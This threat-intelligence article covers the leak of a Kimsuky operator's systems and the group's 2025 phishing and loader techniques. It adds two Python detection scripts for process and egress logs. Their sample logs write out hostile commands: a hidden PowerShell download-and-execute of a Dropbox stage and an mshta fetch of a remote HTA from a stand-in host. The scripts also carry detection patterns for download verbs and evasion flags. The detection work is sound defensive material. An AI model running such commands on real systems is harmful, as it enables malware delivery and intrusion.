In June 2025, the cybersecurity community was shaken: an operator of the North Korean state-sponsored hacking group Kimsuky was himself the victim of a large data breach, which exposed hundreds of gigabytes of internal files, tooling and operational details.
According to researchers at SlowMist, the leaked data included browser histories, detailed phishing campaign logs, and manuals for custom backdoors and attack tooling such as the TomCat kernel backdoor, modified Cobalt Strike beacons, the Ivanti RootRot exploit, and Android malware such as Toybox.
Two Compromised Systems and Hacker “KIM”
The breach was linked to two compromised systems operated by an individual known as “KIM” – one was a Linux developer workstation (Deepin 20.9), the other a publicly accessible VPS server.
The Linux system was likely used for malware development, while the VPS hosted phishing materials, fake login portals, and command-and-control (C2) infrastructure.
The leak was carried out by hackers identifying themselves as “Saber” and “cyb0rg”, who claimed to have stolen and published the contents of both systems. While some evidence ties “KIM” to known Kimsuky infrastructure, linguistic and technical indicators also suggest a possible Chinese connection, leaving the true origin uncertain.
A Long History of Cyber Espionage
Kimsuky has been active since at least 2012 and is linked to the Reconnaissance General Bureau, North Korea’s primary intelligence agency. It has long specialized in cyber espionage targeting governments, think tanks, defense contractors, and academia.
In 2025, its campaigns, such as DEEP#DRIVE, relied on multi-stage attack chains. They typically began with a ZIP archive containing an LNK shortcut disguised as a document; opening it ran a PowerShell command that fetched the next-stage payload from a cloud service such as Dropbox, while a decoy document was displayed so the victim saw what they expected to open.
Advanced Techniques and Tools
In spring 2025, Kimsuky deployed a mix of VBScript and PowerShell hidden inside ZIP archives to:
Log keystrokes
Steal clipboard data
Harvest cryptocurrency wallet keys from browsers (Chrome, Edge, Firefox, Naver Whale)
Attackers also paired malicious LNK files with VBScripts that launched mshta.exe to load DLL-based malware directly into memory, leaving little on disk. They used custom RDP Wrapper modules and proxy malware to enable covert remote access.
Tools such as forceCopy copied browsers' credential-store files (which are normally locked while the browser runs) for offline decryption, rather than reading passwords through the browser, which sidestepped the alerts tied to normal password access.
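As an added example (not code from this report, from Kimsuky's leak, or from any of the vendors cited), the following Python sketch runs two detections over process-creation events: the LNK chain described above, in which explorer.exe spawns PowerShell that pulls a stage from Dropbox or GitHub, and the VBScript-to-mshta.exe in-memory loader. Field names follow Sysmon Event ID 1; the sample events, hostnames, paths and PIDs are constructed for the example.

```python
import json
import re
from dataclasses import dataclass

# Constructed Sysmon-style (Event ID 1) process-creation events, one JSON
# object per line. Hosts, paths and PIDs are made up for this example.
SAMPLE_LOG = r'''
{"ProcessId":1000,"ParentProcessId":900,"Image":"C:\\Windows\\explorer.exe","CommandLine":"explorer.exe"}
{"ProcessId":1001,"ParentProcessId":1000,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -w hidden -ep bypass -c iwr 'https://dl.dropboxusercontent.com/s/abc/stage2.ps1' -OutFile $env:TEMP\\s.ps1; iwr 'https://dl.dropboxusercontent.com/s/abc/decoy.pdf' -OutFile $env:TEMP\\d.pdf; start $env:TEMP\\d.pdf; . $env:TEMP\\s.ps1"}
{"ProcessId":1002,"ParentProcessId":1000,"Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\report.vbs"}
{"ProcessId":1003,"ParentProcessId":1002,"Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe http://203.0.113.5/l.hta"}
{"ProcessId":1004,"ParentProcessId":1000,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -c Get-ChildItem C:\\Projects"}
{"ProcessId":1005,"ParentProcessId":1000,"Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir"}
'''


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str


# File-sharing / code-hosting domains the report names as delivery channels.
CLOUD_DOMAINS = ("dropbox.com", "dropboxusercontent.com",
                 "github.com", "githubusercontent.com")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
DOWNLOAD_RE = re.compile(
    r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
    r"curl|wget|Start-BitsTransfer)\b", re.I)
URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)
# Common evasion switches seen on LNK-launched PowerShell.
FLAG_RE = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass|-(?:e|enc|encodedcommand)\s",
    re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_cloud(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in CLOUD_DOMAINS)


def parse_events(text):
    """Parse one JSON event per line into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        events.append(ProcEvent(int(rec["ProcessId"]), int(rec["ParentProcessId"]),
                                rec["Image"], rec.get("CommandLine", "")))
    return events


def find_chains(events):
    """Return findings as dicts with the rule name, the PID and the evidence."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = _basename(parent.image) if parent else ""
        img = _basename(e.image)
        hosts = URL_RE.findall(e.cmdline)
        cloud = [h for h in hosts if _is_cloud(h)]
        flags = [m.group(0) for m in FLAG_RE.finditer(e.cmdline)]
        # Rule 1: LNK double-click -> explorer.exe spawns PowerShell that pulls
        # a stage from a file-sharing or code-hosting domain (DEEP#DRIVE pattern).
        if img in POWERSHELL and pimg == "explorer.exe" and DOWNLOAD_RE.search(e.cmdline) and cloud:
            findings.append({"rule": "lnk_powershell_cloud_download", "pid": e.pid,
                             "hosts": sorted(set(cloud)), "flags": flags})
        # Rule 2: a script host launches mshta.exe, or mshta is pointed at a
        # remote HTA: the VBScript -> mshta in-memory loader pattern.
        if img == "mshta.exe" and (pimg in SCRIPT_HOSTS or hosts):
            findings.append({"rule": "script_host_mshta_loader", "pid": e.pid,
                             "parent": pimg, "hosts": hosts})
    return findings


if __name__ == "__main__":
    for finding in find_chains(parse_events(SAMPLE_LOG)):
        print(finding)
```

Rule 1 deliberately requires all three conditions (explorer parent, a download verb, a cloud host) so that ordinary PowerShell use such as the `Get-ChildItem` event is not flagged; the evasion switches are recorded as evidence rather than required, since not every sample uses them. Rule 2 treats any mshta.exe with a URL on its command line as suspect regardless of parent, because mshta has no business fetching remote HTAs on a workstation.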
Exploiting Trusted Platforms
Kimsuky abused popular cloud and code-hosting platforms. In a June 2025 spear phishing campaign targeting South Korea, private GitHub repositories were used to store malware and stolen data.
By delivering malware and exfiltrating files via Dropbox and GitHub, the group was able to hide its activity within legitimate network traffic.
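Because blocking Dropbox and GitHub outright is rarely an option, the practical check is to baseline who talks to them. The following Python sketch is an added example (not code from this report or from any vendor) that runs two heuristics over HTTP egress records: requests to those services from scripting clients identified by User-Agent (PowerShell's default User-Agent contains "WindowsPowerShell/"), and per-source upload volume to the services' upload endpoints. The log format, addresses and byte counts are constructed; the browser and `git/` User-Agent fragments in the allowlist are a starting point to extend for your own environment.

```python
import json
from collections import defaultdict

# Domains of the two services the report names as delivery and exfiltration channels.
CLOUD_DOMAINS = ("dropbox.com", "dropboxapi.com", "dropboxusercontent.com",
                 "github.com", "githubusercontent.com")
# Upload endpoints of those services (real API hosts).
UPLOAD_HOSTS = ("content.dropboxapi.com", "uploads.github.com", "api.github.com")
# User-Agent fragments of scripting clients; these should not normally be what
# a workstation uses to talk to a file-sharing service.
SCRIPT_UA = ("WindowsPowerShell", "PowerShell/", "curl/", "Wget/", "python-requests")
# Clients whose GitHub/Dropbox traffic is expected: browsers and the git CLI.
# Extend per site (assumption: this list is a sample, not a complete baseline).
ALLOWED_UA = ("Chrome/", "Firefox/", "Edg/", "Whale/", "git/")
UPLOAD_THRESHOLD = 1_000_000  # bytes per source in the log window; tune per site

# Constructed egress records (one JSON object per line); hosts in the data are
# real service hostnames, everything else is made up for the example.
SAMPLE_LOG = r'''
{"ts":"2025-06-12T09:01:03Z","src":"10.0.0.5","method":"GET","host":"github.com","uri":"/","bytes_out":512,"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"}
{"ts":"2025-06-12T09:02:10Z","src":"10.0.0.5","method":"GET","host":"dl.dropboxusercontent.com","uri":"/s/abc/stage2.ps1","bytes_out":310,"ua":"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"}
{"ts":"2025-06-12T09:05:41Z","src":"10.0.0.5","method":"POST","host":"content.dropboxapi.com","uri":"/2/files/upload","bytes_out":780000,"ua":"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"}
{"ts":"2025-06-12T09:05:42Z","src":"10.0.0.5","method":"POST","host":"content.dropboxapi.com","uri":"/2/files/upload","bytes_out":640000,"ua":"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"}
{"ts":"2025-06-12T09:07:15Z","src":"10.0.0.9","method":"POST","host":"github.com","uri":"/org/repo.git/git-receive-pack","bytes_out":2400000,"ua":"git/2.45.2"}
{"ts":"2025-06-12T09:08:00Z","src":"10.0.0.9","method":"GET","host":"api.github.com","uri":"/repos/org/repo","bytes_out":200,"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"}
'''


def _is_cloud(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in CLOUD_DOMAINS)


def parse_log(text):
    """Parse one JSON record per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_egress(records, threshold=UPLOAD_THRESHOLD):
    """Return findings for scripted clients and bulk uploads to the named services."""
    findings = []
    uploads = defaultdict(int)
    for r in records:
        host = r["host"].lower()
        if not _is_cloud(host):
            continue
        ua = r.get("ua", "")
        scripted = (not ua) or any(s in ua for s in SCRIPT_UA)
        allowed = any(a in ua for a in ALLOWED_UA)
        # Heuristic 1: a scripting client (or no User-Agent at all) reaching the
        # service; a browser or git push would carry an allowlisted agent.
        if scripted and not allowed:
            findings.append({"rule": "script_client_to_cloud", "src": r["src"],
                             "host": host, "ua": ua})
        # Heuristic 2: accumulate bytes sent to upload endpoints by non-allowlisted
        # clients, per source, so many small uploads still add up.
        if r["method"].upper() in ("POST", "PUT") and host in UPLOAD_HOSTS and not allowed:
            uploads[r["src"]] += int(r["bytes_out"])
    for src, total in sorted(uploads.items()):
        if total >= threshold:
            findings.append({"rule": "bulk_upload_to_cloud", "src": src, "bytes_out": total})
    return findings


if __name__ == "__main__":
    for finding in find_egress(parse_log(SAMPLE_LOG)):
        print(finding)
```

The User-Agent check is cheap to evade (a script can send any agent string), which is why the upload-volume heuristic is aggregated per source rather than per request; the git push from 10.0.0.9 is larger than the threshold but is not counted because `git/` is an expected client. Exfiltration through a real browser session would pass both checks, so this complements, rather than replaces, the process-level detections.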